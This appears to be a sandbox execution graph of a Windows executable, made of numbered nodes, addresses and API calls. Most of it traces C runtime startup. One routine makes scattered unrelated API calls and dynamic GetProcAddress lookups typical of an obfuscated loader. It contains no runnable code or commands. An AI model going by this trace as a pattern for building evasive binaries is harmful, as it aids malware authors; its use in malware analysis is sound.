                            execution_graph 5744 401440 5745 401451 5744->5745 5788 4026af HeapCreate 5745->5788 5748 401490 5840 405003 GetModuleHandleW 5748->5840 5751 401496 5752 4014a2 __RTC_Initialize 5751->5752 5753 40149a 5751->5753 5790 404953 5752->5790 5754 4013e8 _fast_error_exit 67 API calls 5753->5754 5755 4014a1 5754->5755 5755->5752 5757 4014af 5758 4014b3 5757->5758 5759 4014bb GetCommandLineW 5757->5759 5873 40368a 5758->5873 5805 4048f6 GetEnvironmentStringsW 5759->5805 5762 4014ca 5880 404848 GetModuleFileNameW 5762->5880 5765 4014d4 5766 4014e0 5765->5766 5767 4014d8 5765->5767 5811 404619 5766->5811 5768 40368a __amsg_exit 67 API calls 5767->5768 5770 4014df 5768->5770 5770->5766 5772 4014f1 5823 403749 5772->5823 5773 4014e9 5774 40368a __amsg_exit 67 API calls 5773->5774 5776 4014f0 5774->5776 5776->5772 5777 4014f7 5778 4014fc 5777->5778 5781 401503 __wwincmdln 5777->5781 5779 40368a __amsg_exit 67 API calls 5778->5779 5780 401502 5779->5780 5780->5781 5781->5780 5829 423af0 5781->5829 5783 401523 5784 401531 5783->5784 5884 4038fa 5783->5884 5887 403926 5784->5887 5787 401536 _flsall 5789 401484 5788->5789 5789->5748 5832 4013e8 5789->5832 5890 403354 5790->5890 5792 40495f GetStartupInfoA 5891 406728 5792->5891 5794 404b9e _flsall 5794->5757 5795 404b1b GetStdHandle 5800 404ae5 5795->5800 5796 406728 __calloc_crt 67 API calls 5799 404980 5796->5799 5797 404b80 SetHandleCount 5797->5794 5798 404b2d GetFileType 5798->5800 5799->5794 5799->5796 5799->5800 5802 404a68 5799->5802 5800->5794 5800->5795 5800->5797 5800->5798 5803 406b59 __mtinitlocknum InitializeCriticalSectionAndSpinCount 5800->5803 5801 404a91 GetFileType 5801->5802 5802->5794 5802->5800 5802->5801 5896 406b59 5802->5896 5803->5800 5806 404907 5805->5806 5807 40490b 5805->5807 5806->5762 5808 4066e3 __malloc_crt 67 API calls 5807->5808 5809 40492c _realloc 5808->5809 5810 404933 FreeEnvironmentStringsW 5809->5810 5810->5762 5812 404631 _wcslen 5811->5812 5816 4014e5 5811->5816 5813 406728 __calloc_crt 67 API calls 5812->5813 5821 404655 _wcslen 5813->5821 5814 4046ba 5815 4010ad ___free_lconv_mon 67 API calls 5814->5815 5815->5816 5816->5772 5816->5773 5817 406728 __calloc_crt 67 API calls 5817->5821 5818 4046e0 5820 4010ad ___free_lconv_mon 67 API calls 5818->5820 5820->5816 5821->5814 5821->5816 5821->5817 5821->5818 5822 4024d6 __invoke_watson 10 API calls 5821->5822 6255 407c26 5821->6255 5822->5821 5824 403757 __IsNonwritableInCurrentImage 5823->5824 6264 4066c2 5824->6264 5826 403775 __initterm_e 5828 403794 __IsNonwritableInCurrentImage __initterm 5826->5828 6268 4072f4 5826->6268 5828->5777 6368 42379f 5829->6368 5831 423af5 5831->5783 5833 4013f6 5832->5833 5834 4013fb 5832->5834 5835 403b3d __FF_MSGBANNER 67 API calls 5833->5835 5836 403992 __NMSG_WRITE 67 API calls 5834->5836 5835->5834 5837 401403 5836->5837 5838 4036de _fast_error_exit 3 API calls 5837->5838 5839 40140d 5838->5839 5839->5748 5841 405017 5840->5841 5842 40501d 5840->5842 5843 40365a __crt_waiting_on_module_handle 2 API calls 5841->5843 5844 405186 5842->5844 5845 405028 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5842->5845 5843->5842 7127 404d1d 5844->7127 5847 405071 TlsAlloc 5845->5847 5849 40518b 5847->5849 5850 4050bf TlsSetValue 5847->5850 5849->5751 5850->5849 5851 4050d0 5850->5851 7116 403944 5851->7116 5854 404bf3 __encode_pointer 6 API calls 5855 4050e0 5854->5855 5856 404bf3 __encode_pointer 6 API calls 5855->5856 5857 4050f0 5856->5857 5858 404bf3 __encode_pointer 6 API calls 5857->5858 5859 405100 5858->5859 5860 404bf3 __encode_pointer 6 API calls 5859->5860 5861 405110 5860->5861 7123 4026df 5861->7123 5864 404c6e __decode_pointer 6 API calls 5865 405131 5864->5865 5865->5844 5866 406728 __calloc_crt 67 API calls 5865->5866 5867 40514a 5866->5867 5867->5844 5868 404c6e __decode_pointer 6 API calls 5867->5868 5869 405164 5868->5869 5869->5844 5870 40516b 5869->5870 5871 404d5a __initptd 67 API calls 5870->5871 5872 405173 GetCurrentThreadId 5871->5872 5872->5849 5874 403b3d __FF_MSGBANNER 67 API calls 5873->5874 5875 403694 5874->5875 5876 403992 __NMSG_WRITE 67 API calls 5875->5876 5877 40369c 5876->5877 5878 404c6e __decode_pointer 6 API calls 5877->5878 5879 4014ba 5878->5879 5879->5759 5881 40487d _wparse_cmdline 5880->5881 5882 4066e3 __malloc_crt 67 API calls 5881->5882 5883 4048c0 _wparse_cmdline 5881->5883 5882->5883 5883->5765 7136 4037ce 5884->7136 5886 40390b 5886->5784 5888 4037ce _doexit 67 API calls 5887->5888 5889 403931 5888->5889 5889->5787 5890->5792 5893 406731 5891->5893 5894 40676e 5893->5894 5895 40674f Sleep 5893->5895 5900 40353c 5893->5900 5894->5799 5895->5893 6254 403354 5896->6254 5898 406b65 InitializeCriticalSectionAndSpinCount 5899 406ba9 _flsall 5898->5899 5899->5802 5901 403548 _flsall 5900->5901 5902 403560 5901->5902 5910 40357f _memset 5901->5910 5913 402666 5902->5913 5906 4035f1 HeapAlloc 5906->5910 5907 403575 _flsall 5907->5893 5910->5906 5910->5907 5919 40285b 5910->5919 5926 40306d 5910->5926 5932 403638 5910->5932 5935 403b85 5910->5935 5938 404e41 GetLastError 5913->5938 5915 40266b 5916 4025fe 5915->5916 5917 404c6e __decode_pointer 6 API calls 5916->5917 5918 40260e __invoke_watson 5917->5918 5920 402870 5919->5920 5921 402883 EnterCriticalSection 5919->5921 6038 402798 5920->6038 5921->5910 5923 402876 5923->5921 5924 40368a __amsg_exit 66 API calls 5923->5924 5925 402882 5924->5925 5925->5921 5929 40309b 5926->5929 5927 403134 5931 40313d 5927->5931 6249 402c84 5927->6249 5929->5927 5929->5931 6242 402bd4 5929->6242 5931->5910 6253 402781 LeaveCriticalSection 5932->6253 5934 40363f 5934->5910 5936 404c6e __decode_pointer 6 API calls 5935->5936 5937 403b95 5936->5937 5937->5910 5952 404ce9 TlsGetValue 5938->5952 5941 404eae SetLastError 5941->5915 5942 406728 __calloc_crt 64 API calls 5943 404e6c 5942->5943 5943->5941 5957 404c6e TlsGetValue 5943->5957 5946 404ea5 5985 4010ad 5946->5985 5947 404e8d 5967 404d5a 5947->5967 5950 404e95 GetCurrentThreadId 5950->5941 5951 404eab 5951->5941 5953 404d19 5952->5953 5954 404cfe 5952->5954 5953->5941 5953->5942 5955 404c6e __decode_pointer 6 API calls 5954->5955 5956 404d09 TlsSetValue 5955->5956 5956->5953 5958 404c86 5957->5958 5959 404ca7 GetModuleHandleW 5957->5959 5958->5959 5960 404c90 TlsGetValue 5958->5960 5961 404cc2 GetProcAddress 5959->5961 5962 404cb7 5959->5962 5965 404c9b 5960->5965 5964 404c9f 5961->5964 5998 40365a 5962->5998 5964->5946 5964->5947 5965->5959 5965->5964 6002 403354 5967->6002 5969 404d66 GetModuleHandleW 5970 404d76 5969->5970 5971 404d7c 5969->5971 5974 40365a __crt_waiting_on_module_handle 2 API calls 5970->5974 5972 404d94 GetProcAddress GetProcAddress 5971->5972 5973 404db8 5971->5973 5972->5973 5975 40285b __lock 63 API calls 5973->5975 5974->5971 5976 404dd7 InterlockedIncrement 5975->5976 6003 404e2f 5976->6003 5979 40285b __lock 63 API calls 5980 404df8 5979->5980 6006 4064e6 InterlockedIncrement 5980->6006 5982 404e16 6018 404e38 5982->6018 5984 404e23 _flsall 5984->5950 5987 4010b9 _flsall 5985->5987 5986 401132 __dosmaperr _flsall 5986->5951 5987->5986 5988 4010f8 5987->5988 5990 40285b __lock 65 API calls 5987->5990 5988->5986 5989 40110d HeapFree 5988->5989 5989->5986 5991 40111f 5989->5991 5994 4010d0 ___sbh_find_block 5990->5994 5992 402666 __cftof2_l 65 API calls 5991->5992 5993 401124 GetLastError 5992->5993 5993->5986 5995 4010ea 5994->5995 6023 4028be 5994->6023 6030 401103 5995->6030 5999 403665 Sleep GetModuleHandleW 5998->5999 6000 403683 5999->6000 6001 403687 5999->6001 6000->5999 6000->6001 6001->5961 6001->5964 6002->5969 6021 402781 LeaveCriticalSection 6003->6021 6005 404df1 6005->5979 6007 406504 InterlockedIncrement 6006->6007 6008 406507 6006->6008 6007->6008 6009 406511 InterlockedIncrement 6008->6009 6010 406514 6008->6010 6009->6010 6011 406521 6010->6011 6012 40651e InterlockedIncrement 6010->6012 6013 40652b InterlockedIncrement 6011->6013 6015 40652e 6011->6015 6012->6011 6013->6015 6014 406547 InterlockedIncrement 6014->6015 6015->6014 6016 406557 InterlockedIncrement 6015->6016 6017 406562 InterlockedIncrement 6015->6017 6016->6015 6017->5982 6022 402781 LeaveCriticalSection 6018->6022 6020 404e3f 6020->5984 6021->6005 6022->6020 6024 402b9f 6023->6024 6025 4028fd 6023->6025 6024->5995 6025->6024 6026 402ae9 VirtualFree 6025->6026 6027 402b4d 6026->6027 6027->6024 6028 402b5c VirtualFree HeapFree 6027->6028 6033 406bc0 6028->6033 6037 402781 LeaveCriticalSection 6030->6037 6032 40110a 6032->5988 6034 406bd8 6033->6034 6035 406bff __VEC_memcpy 6034->6035 6036 406c07 6034->6036 6035->6036 6036->6024 6037->6032 6039 4027a4 _flsall 6038->6039 6040 4027ca 6039->6040 6064 403b3d 6039->6064 6046 4027da _flsall 6040->6046 6110 4066e3 6040->6110 6046->5923 6048 4027fb 6050 40285b __lock 67 API calls 6048->6050 6049 4027ec 6052 402666 __cftof2_l 67 API calls 6049->6052 6053 402802 6050->6053 6052->6046 6054 402836 6053->6054 6055 40280a 6053->6055 6057 4010ad ___free_lconv_mon 67 API calls 6054->6057 6056 406b59 __mtinitlocknum InitializeCriticalSectionAndSpinCount 6055->6056 6058 402815 6056->6058 6063 402827 6057->6063 6060 4010ad ___free_lconv_mon 67 API calls 6058->6060 6058->6063 6061 402821 6060->6061 6062 402666 __cftof2_l 67 API calls 6061->6062 6062->6063 6115 402852 6063->6115 6118 40787f 6064->6118 6067 403b51 6069 403992 __NMSG_WRITE 67 API calls 6067->6069 6072 4027b9 6067->6072 6068 40787f __set_error_mode 67 API calls 6068->6067 6070 403b69 6069->6070 6071 403992 __NMSG_WRITE 67 API calls 6070->6071 6071->6072 6073 403992 6072->6073 6074 4039a6 6073->6074 6075 40787f __set_error_mode 64 API calls 6074->6075 6106 4027c0 6074->6106 6076 4039c8 6075->6076 6077 403b06 GetStdHandle 6076->6077 6079 40787f __set_error_mode 64 API calls 6076->6079 6078 403b14 _strlen 6077->6078 6077->6106 6082 403b2d WriteFile 6078->6082 6078->6106 6080 4039d9 6079->6080 6080->6077 6081 4039eb 6080->6081 6081->6106 6124 407817 6081->6124 6082->6106 6085 403a21 GetModuleFileNameA 6086 403a3f 6085->6086 6093 403a62 _strlen 6085->6093 6088 407817 _strcpy_s 64 API calls 6086->6088 6090 403a4f 6088->6090 6092 4024d6 __invoke_watson 10 API calls 6090->6092 6090->6093 6091 403aa5 6149 4076ee 6091->6149 6092->6093 6093->6091 6140 407762 6093->6140 6097 403ac9 6100 4076ee _strcat_s 64 API calls 6097->6100 6099 4024d6 __invoke_watson 10 API calls 6099->6097 6102 403add 6100->6102 6101 4024d6 __invoke_watson 10 API calls 6101->6091 6103 403aee 6102->6103 6105 4024d6 __invoke_watson 10 API calls 6102->6105 6158 407585 6103->6158 6105->6103 6107 4036de 6106->6107 6209 4036b3 GetModuleHandleW 6107->6209 6111 4066ec 6110->6111 6113 4027e5 6111->6113 6114 406703 Sleep 6111->6114 6212 4011ca 6111->6212 6113->6048 6113->6049 6114->6111 6241 402781 LeaveCriticalSection 6115->6241 6117 402859 6117->6046 6119 40788e 6118->6119 6120 403b44 6119->6120 6121 402666 __cftof2_l 67 API calls 6119->6121 6120->6067 6120->6068 6122 4078b1 6121->6122 6123 4025fe __cftof2_l 6 API calls 6122->6123 6123->6120 6125 40782f 6124->6125 6126 407828 6124->6126 6127 402666 __cftof2_l 67 API calls 6125->6127 6126->6125 6131 407855 6126->6131 6128 407834 6127->6128 6129 4025fe __cftof2_l 6 API calls 6128->6129 6130 403a0d 6129->6130 6130->6085 6133 4024d6 6130->6133 6131->6130 6132 402666 __cftof2_l 67 API calls 6131->6132 6132->6128 6185 406ad0 6133->6185 6135 402503 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6136 4025df GetCurrentProcess TerminateProcess 6135->6136 6139 4025d3 __invoke_watson 6135->6139 6187 401006 6136->6187 6138 4025fc 6138->6085 6139->6136 6141 407774 6140->6141 6144 407778 6141->6144 6146 403a92 6141->6146 6147 4077be 6141->6147 6142 402666 __cftof2_l 67 API calls 6143 407794 6142->6143 6145 4025fe __cftof2_l 6 API calls 6143->6145 6144->6142 6144->6146 6145->6146 6146->6091 6146->6101 6147->6146 6148 402666 __cftof2_l 67 API calls 6147->6148 6148->6143 6150 407706 6149->6150 6153 4076ff 6149->6153 6151 402666 __cftof2_l 67 API calls 6150->6151 6152 40770b 6151->6152 6154 4025fe __cftof2_l 6 API calls 6152->6154 6153->6150 6156 40773a 6153->6156 6155 403ab8 6154->6155 6155->6097 6155->6099 6156->6155 6157 402666 __cftof2_l 67 API calls 6156->6157 6157->6152 6196 404c65 6158->6196 6161 4075a8 LoadLibraryA 6162 4076d2 6161->6162 6163 4075bd GetProcAddress 6161->6163 6162->6106 6163->6162 6165 4075d3 6163->6165 6164 407630 6168 404c6e __decode_pointer 6 API calls 6164->6168 6181 40765a 6164->6181 6199 404bf3 TlsGetValue 6165->6199 6166 404c6e __decode_pointer 6 API calls 6166->6162 6167 404c6e __decode_pointer 6 API calls 6176 40769d 6167->6176 6170 40764d 6168->6170 6172 404c6e __decode_pointer 6 API calls 6170->6172 6172->6181 6173 404bf3 __encode_pointer 6 API calls 6174 4075ee GetProcAddress 6173->6174 6175 404bf3 __encode_pointer 6 API calls 6174->6175 6177 407603 GetProcAddress 6175->6177 6180 404c6e __decode_pointer 6 API calls 6176->6180 6183 407685 6176->6183 6178 404bf3 __encode_pointer 6 API calls 6177->6178 6179 407618 6178->6179 6179->6164 6182 407622 GetProcAddress 6179->6182 6180->6183 6181->6167 6181->6183 6184 404bf3 __encode_pointer 6 API calls 6182->6184 6183->6166 6184->6164 6186 406adc __VEC_memzero 6185->6186 6186->6135 6188 401010 IsDebuggerPresent 6187->6188 6189 40100e 6187->6189 6195 405226 6188->6195 6189->6138 6192 401665 SetUnhandledExceptionFilter UnhandledExceptionFilter 6193 401682 __invoke_watson 6192->6193 6194 40168a GetCurrentProcess TerminateProcess 6192->6194 6193->6194 6194->6138 6195->6192 6197 404bf3 __encode_pointer 6 API calls 6196->6197 6198 404c6c 6197->6198 6198->6161 6198->6164 6200 404c0b 6199->6200 6201 404c2c GetModuleHandleW 6199->6201 6200->6201 6202 404c15 TlsGetValue 6200->6202 6203 404c47 GetProcAddress 6201->6203 6204 404c3c 6201->6204 6206 404c20 6202->6206 6208 404c24 GetProcAddress 6203->6208 6205 40365a __crt_waiting_on_module_handle 2 API calls 6204->6205 6207 404c42 6205->6207 6206->6201 6206->6208 6207->6203 6207->6208 6208->6173 6210 4036c7 GetProcAddress 6209->6210 6211 4036d7 ExitProcess 6209->6211 6210->6211 6213 40127d 6212->6213 6218 4011dc 6212->6218 6214 403b85 __calloc_impl 6 API calls 6213->6214 6215 401283 6214->6215 6217 402666 __cftof2_l 66 API calls 6215->6217 6216 403b3d __FF_MSGBANNER 66 API calls 6216->6218 6221 401275 6217->6221 6218->6216 6220 403992 __NMSG_WRITE 66 API calls 6218->6220 6218->6221 6222 401239 HeapAlloc 6218->6222 6223 4036de _fast_error_exit 3 API calls 6218->6223 6224 401269 6218->6224 6226 403b85 __calloc_impl 6 API calls 6218->6226 6227 40126e 6218->6227 6229 40117b 6218->6229 6220->6218 6221->6111 6222->6218 6223->6218 6225 402666 __cftof2_l 66 API calls 6224->6225 6225->6227 6226->6218 6228 402666 __cftof2_l 66 API calls 6227->6228 6228->6221 6230 401187 _flsall 6229->6230 6231 4011b8 _flsall 6230->6231 6232 40285b __lock 67 API calls 6230->6232 6231->6218 6233 40119d 6232->6233 6234 40306d ___sbh_alloc_block 5 API calls 6233->6234 6235 4011a8 6234->6235 6237 4011c1 6235->6237 6240 402781 LeaveCriticalSection 6237->6240 6239 4011c8 6239->6231 6240->6239 6241->6117 6243 402be7 HeapReAlloc 6242->6243 6244 402c1b HeapAlloc 6242->6244 6245 402c05 6243->6245 6246 402c09 6243->6246 6244->6245 6247 402c3e VirtualAlloc 6244->6247 6245->5927 6246->6244 6247->6245 6248 402c58 HeapFree 6247->6248 6248->6245 6250 402c9b VirtualAlloc 6249->6250 6252 402ce2 6250->6252 6252->5931 6253->5934 6254->5898 6256 407c37 6255->6256 6257 407c3e 6255->6257 6256->6257 6262 407c6a 6256->6262 6258 402666 __cftof2_l 67 API calls 6257->6258 6259 407c43 6258->6259 6260 4025fe __cftof2_l 6 API calls 6259->6260 6261 407c52 6260->6261 6261->5821 6262->6261 6263 402666 __cftof2_l 67 API calls 6262->6263 6263->6259 6265 4066c8 6264->6265 6266 404bf3 __encode_pointer 6 API calls 6265->6266 6267 4066e0 6265->6267 6266->6265 6267->5826 6271 4072b8 6268->6271 6270 407301 6270->5828 6272 4072c4 _flsall 6271->6272 6279 4036f6 6272->6279 6278 4072e5 _flsall 6278->6270 6280 40285b __lock 67 API calls 6279->6280 6281 4036fd 6280->6281 6282 4071cd 6281->6282 6283 404c6e __decode_pointer 6 API calls 6282->6283 6284 4071e1 6283->6284 6285 404c6e __decode_pointer 6 API calls 6284->6285 6286 4071f1 6285->6286 6287 407274 6286->6287 6302 4093cb 6286->6302 6299 4072ee 6287->6299 6289 40725b 6290 404bf3 __encode_pointer 6 API calls 6289->6290 6291 407269 6290->6291 6294 404bf3 __encode_pointer 6 API calls 6291->6294 6292 407233 6292->6287 6296 406774 __realloc_crt 73 API calls 6292->6296 6297 407249 6292->6297 6293 40720f 6293->6289 6293->6292 6315 406774 6293->6315 6294->6287 6296->6297 6297->6287 6298 404bf3 __encode_pointer 6 API calls 6297->6298 6298->6289 6364 4036ff 6299->6364 6303 4093d7 _flsall 6302->6303 6304 409404 6303->6304 6305 4093e7 6303->6305 6307 409445 HeapSize 6304->6307 6309 40285b __lock 67 API calls 6304->6309 6306 402666 __cftof2_l 67 API calls 6305->6306 6308 4093ec 6306->6308 6311 4093fc _flsall 6307->6311 6310 4025fe __cftof2_l 6 API calls 6308->6310 6312 409414 ___sbh_find_block 6309->6312 6310->6311 6311->6293 6320 409465 6312->6320 6317 40677d 6315->6317 6318 4067bc 6317->6318 6319 40679d Sleep 6317->6319 6324 408d69 6317->6324 6318->6292 6319->6317 6323 402781 LeaveCriticalSection 6320->6323 6322 409440 6322->6307 6322->6311 6323->6322 6325 408d75 _flsall 6324->6325 6326 408d8a 6325->6326 6327 408d7c 6325->6327 6329 408d91 6326->6329 6330 408d9d 6326->6330 6328 4011ca _malloc 67 API calls 6327->6328 6332 408d84 __dosmaperr _flsall 6328->6332 6331 4010ad ___free_lconv_mon 67 API calls 6329->6331 6334 408f0f 6330->6334 6358 408daa ___sbh_resize_block _realloc ___sbh_find_block 6330->6358 6331->6332 6332->6317 6333 408f42 6336 403b85 __calloc_impl 6 API calls 6333->6336 6334->6333 6335 408f14 HeapReAlloc 6334->6335 6340 403b85 __calloc_impl 6 API calls 6334->6340 6341 408f66 6334->6341 6343 408f5c 6334->6343 6335->6332 6335->6334 6338 408f48 6336->6338 6337 40285b __lock 67 API calls 6337->6358 6339 402666 __cftof2_l 67 API calls 6338->6339 6339->6332 6340->6334 6341->6332 6342 402666 __cftof2_l 67 API calls 6341->6342 6344 408f6f GetLastError 6342->6344 6346 402666 __cftof2_l 67 API calls 6343->6346 6344->6332 6348 408edd 6346->6348 6347 408e35 HeapAlloc 6347->6358 6348->6332 6350 408ee2 GetLastError 6348->6350 6349 408e8a HeapReAlloc 6349->6358 6350->6332 6351 40306d ___sbh_alloc_block 5 API calls 6351->6358 6352 408ef5 6352->6332 6354 402666 __cftof2_l 67 API calls 6352->6354 6353 403b85 __calloc_impl 6 API calls 6353->6358 6355 408f02 6354->6355 6355->6332 6355->6344 6356 408ed8 6357 402666 __cftof2_l 67 API calls 6356->6357 6357->6348 6358->6332 6358->6333 6358->6337 6358->6347 6358->6349 6358->6351 6358->6352 6358->6353 6358->6356 6359 4028be VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 6358->6359 6360 408ead 6358->6360 6359->6358 6363 402781 LeaveCriticalSection 6360->6363 6362 408eb4 6362->6358 6363->6362 6367 402781 LeaveCriticalSection 6364->6367 6366 403706 6366->6278 6367->6366 6369 4237af __ftelli64_nolock 6368->6369 6370 42381f GetLogicalDriveStringsW DeleteVolumeMountPointW GetCommandLineA 6369->6370 6371 42383d 6369->6371 6370->6369 6372 42384a 11 API calls 6371->6372 6373 423948 6371->6373 6375 406ad0 _memset 6372->6375 6374 42394a SetCommMask GetTickCount GetSystemTimes 6373->6374 6378 42397d 6373->6378 6374->6373 6376 42397f 6374->6376 6377 423902 GetDefaultCommConfigA DebugBreak EnumDateFormatsW 6375->6377 6376->6378 6379 423988 FoldStringW 6376->6379 6380 42393a 6377->6380 6381 42392a LoadLibraryA LoadLibraryA 6377->6381 6383 4239a0 OpenWaitableTimerA HeapLock FormatMessageW 6378->6383 6384 423a41 GlobalAlloc 6378->6384 6379->6378 6414 401302 6380->6414 6381->6380 6417 401323 6383->6417 6386 423a86 LoadLibraryA 6384->6386 6387 423a5f 6384->6387 6385 423940 6385->6373 6458 423485 6386->6458 6387->6386 6390 4239ec 6392 4011ca _malloc 67 API calls 6390->6392 6391 423a96 6462 42370a 6391->6462 6393 4239f2 6392->6393 6432 401093 6393->6432 6397 4010ad ___free_lconv_mon 67 API calls 6398 423a0e 6397->6398 6435 40113b 6398->6435 6401 401323 _printf 103 API calls 6402 423a21 6401->6402 6442 407c1d 6402->6442 6403 423aa0 6405 401006 __ftelli64_nolock 5 API calls 6403->6405 6407 423aec 6405->6407 6407->5831 6408 40113b _calloc 67 API calls 6409 423a2d 6408->6409 6445 401294 6409->6445 6412 40113b _calloc 67 API calls 6413 423a3e 6412->6413 6413->6384 6475 404172 6414->6475 6418 40132f _flsall 6417->6418 6419 40135a _printf 6418->6419 6420 40133d 6418->6420 6781 4042b5 6419->6781 6421 402666 __cftof2_l 67 API calls 6420->6421 6422 401342 6421->6422 6423 4025fe __cftof2_l 6 API calls 6422->6423 6426 401352 _flsall 6423->6426 6425 40136c _printf 6786 404352 6425->6786 6426->6390 6428 40137e _printf 6793 4043ee 6428->6793 6964 401015 6432->6964 6436 40353c __calloc_impl 67 API calls 6435->6436 6437 401155 6436->6437 6438 402666 __cftof2_l 67 API calls 6437->6438 6441 401171 6437->6441 6439 401168 6438->6439 6440 402666 __cftof2_l 67 API calls 6439->6440 6439->6441 6440->6441 6441->6401 7033 407b43 6442->7033 6444 407c24 6444->6408 6446 4012a1 6445->6446 6447 4012be 6445->6447 6448 402666 __cftof2_l 67 API calls 6446->6448 6449 4012e3 6447->6449 6450 4012c6 6447->6450 6452 4012a6 6448->6452 7050 403ef9 6449->7050 6453 402666 __cftof2_l 67 API calls 6450->6453 6454 4025fe __cftof2_l 6 API calls 6452->6454 6455 4012cb 6453->6455 6456 4012b6 6454->6456 6457 4025fe __cftof2_l 6 API calls 6455->6457 6456->6412 6457->6456 6459 4234c4 6458->6459 6460 4234d0 GetModuleHandleW GetProcAddress 6459->6460 6461 4235a6 6459->6461 6460->6459 6461->6391 6463 423736 GetFullPathNameW 6462->6463 6464 42374a 6462->6464 6463->6464 7097 4235e6 6464->7097 6467 423766 7102 423635 6467->7102 6468 42375f FreeEnvironmentStringsW 6468->6467 6471 423790 6473 401006 __ftelli64_nolock 5 API calls 6471->6473 6472 42377b HeapCreate SetFileShortNameA 6472->6471 6474 42379d 6473->6474 6474->6403 6476 40418b 6475->6476 6479 403f43 6476->6479 6491 401802 6479->6491 6481 403f6a 6483 402666 __cftof2_l 67 API calls 6481->6483 6484 403f6f 6483->6484 6485 4025fe __cftof2_l 6 API calls 6484->6485 6488 401313 6485->6488 6487 403fa7 6489 403fec 6487->6489 6499 4078fb 6487->6499 6488->6385 6489->6488 6490 402666 __cftof2_l 67 API calls 6489->6490 6490->6488 6492 401815 6491->6492 6498 401862 6491->6498 6506 404eba 6492->6506 6495 401842 6495->6498 6526 405ee0 6495->6526 6498->6481 6498->6487 6500 401802 _LocaleUpdate::_LocaleUpdate 77 API calls 6499->6500 6501 40790f 6500->6501 6505 40791c 6501->6505 6714 4069e4 6501->6714 6505->6487 6507 404e41 __getptd_noexit 67 API calls 6506->6507 6508 404ec2 6507->6508 6509 40181a 6508->6509 6510 40368a __amsg_exit 67 API calls 6508->6510 6509->6495 6511 40664c 6509->6511 6510->6509 6512 406658 _flsall 6511->6512 6513 404eba __getptd 67 API calls 6512->6513 6514 40665d 6513->6514 6515 40668b 6514->6515 6516 40666f 6514->6516 6517 40285b __lock 67 API calls 6515->6517 6518 404eba __getptd 67 API calls 6516->6518 6519 406692 6517->6519 6520 406674 6518->6520 6542 40660e 6519->6542 6524 406682 _flsall 6520->6524 6525 40368a __amsg_exit 67 API calls 6520->6525 6524->6495 6525->6524 6527 405eec _flsall 6526->6527 6528 404eba __getptd 67 API calls 6527->6528 6529 405ef1 6528->6529 6530 40285b __lock 67 API calls 6529->6530 6531 405f03 6529->6531 6532 405f21 6530->6532 6533 405f11 _flsall 6531->6533 6535 40368a __amsg_exit 67 API calls 6531->6535 6534 405f6a 6532->6534 6537 405f52 InterlockedIncrement 6532->6537 6538 405f38 InterlockedDecrement 6532->6538 6533->6498 6710 405f7b 6534->6710 6535->6533 6537->6534 6538->6537 6539 405f43 6538->6539 6539->6537 6540 4010ad ___free_lconv_mon 67 API calls 6539->6540 6541 405f51 6540->6541 6541->6537 6543 406612 6542->6543 6544 406644 6542->6544 6543->6544 6545 4064e6 ___addlocaleref 8 API calls 6543->6545 6550 4066b6 6544->6550 6546 406625 6545->6546 6546->6544 6553 406575 6546->6553 6709 402781 LeaveCriticalSection 6550->6709 6552 4066bd 6552->6520 6554 406586 InterlockedDecrement 6553->6554 6555 406609 6553->6555 6556 40659b InterlockedDecrement 6554->6556 6557 40659e 6554->6557 6555->6544 6567 40639d 6555->6567 6556->6557 6558 4065a8 InterlockedDecrement 6557->6558 6559 4065ab 6557->6559 6558->6559 6560 4065b5 InterlockedDecrement 6559->6560 6561 4065b8 6559->6561 6560->6561 6562 4065c2 InterlockedDecrement 6561->6562 6564 4065c5 6561->6564 6562->6564 6563 4065de InterlockedDecrement 6563->6564 6564->6563 6565 4065ee InterlockedDecrement 6564->6565 6566 4065f9 InterlockedDecrement 6564->6566 6565->6564 6566->6555 6568 406421 6567->6568 6570 4063b4 6567->6570 6569 4010ad ___free_lconv_mon 67 API calls 6568->6569 6571 40646e 6568->6571 6572 406442 6569->6572 6570->6568 6577 4063e8 6570->6577 6580 4010ad ___free_lconv_mon 67 API calls 6570->6580 6590 406495 6571->6590 6621 4089d5 6571->6621 6574 4010ad ___free_lconv_mon 67 API calls 6572->6574 6576 406455 6574->6576 6582 4010ad ___free_lconv_mon 67 API calls 6576->6582 6583 4010ad ___free_lconv_mon 67 API calls 6577->6583 6596 406409 6577->6596 6578 4010ad ___free_lconv_mon 67 API calls 6584 406416 6578->6584 6579 4064da 6585 4010ad ___free_lconv_mon 67 API calls 6579->6585 6586 4063dd 6580->6586 6581 4010ad ___free_lconv_mon 67 API calls 6581->6590 6589 406463 6582->6589 6591 4063fe 6583->6591 6593 4010ad ___free_lconv_mon 67 API calls 6584->6593 6587 4064e0 6585->6587 6597 408baf 6586->6597 6587->6544 6594 4010ad ___free_lconv_mon 67 API calls 6589->6594 6590->6579 6592 4010ad 67 API calls ___free_lconv_mon 6590->6592 6613 408b6a 6591->6613 6592->6590 6593->6568 6594->6571 6596->6578 6598 408bbc 6597->6598 6612 408c39 6597->6612 6599 408bcd 6598->6599 6600 4010ad ___free_lconv_mon 67 API calls 6598->6600 6601 408bdf 6599->6601 6602 4010ad ___free_lconv_mon 67 API calls 6599->6602 6600->6599 6603 408bf1 6601->6603 6605 4010ad ___free_lconv_mon 67 API calls 6601->6605 6602->6601 6604 408c03 6603->6604 6606 4010ad ___free_lconv_mon 67 API calls 6603->6606 6607 4010ad ___free_lconv_mon 67 API calls 6604->6607 6608 408c15 6604->6608 6605->6603 6606->6604 6607->6608 6609 408c27 6608->6609 6610 4010ad ___free_lconv_mon 67 API calls 6608->6610 6611 4010ad ___free_lconv_mon 67 API calls 6609->6611 6609->6612 6610->6609 6611->6612 6612->6577 6614 408b77 6613->6614 6620 408bab 6613->6620 6615 408b87 6614->6615 6617 4010ad ___free_lconv_mon 67 API calls 6614->6617 6616 408b99 6615->6616 6618 4010ad ___free_lconv_mon 67 API calls 6615->6618 6619 4010ad ___free_lconv_mon 67 API calls 6616->6619 6616->6620 6617->6615 6618->6616 6619->6620 6620->6596 6622 4089e6 6621->6622 6623 40648e 6621->6623 6624 4010ad ___free_lconv_mon 67 API calls 6622->6624 6623->6581 6625 4089ee 6624->6625 6626 4010ad ___free_lconv_mon 67 API calls 6625->6626 6627 4089f6 6626->6627 6628 4010ad ___free_lconv_mon 67 API calls 6627->6628 6629 4089fe 6628->6629 6630 4010ad ___free_lconv_mon 67 API calls 6629->6630 6631 408a06 6630->6631 6632 4010ad ___free_lconv_mon 67 API calls 6631->6632 6633 408a0e 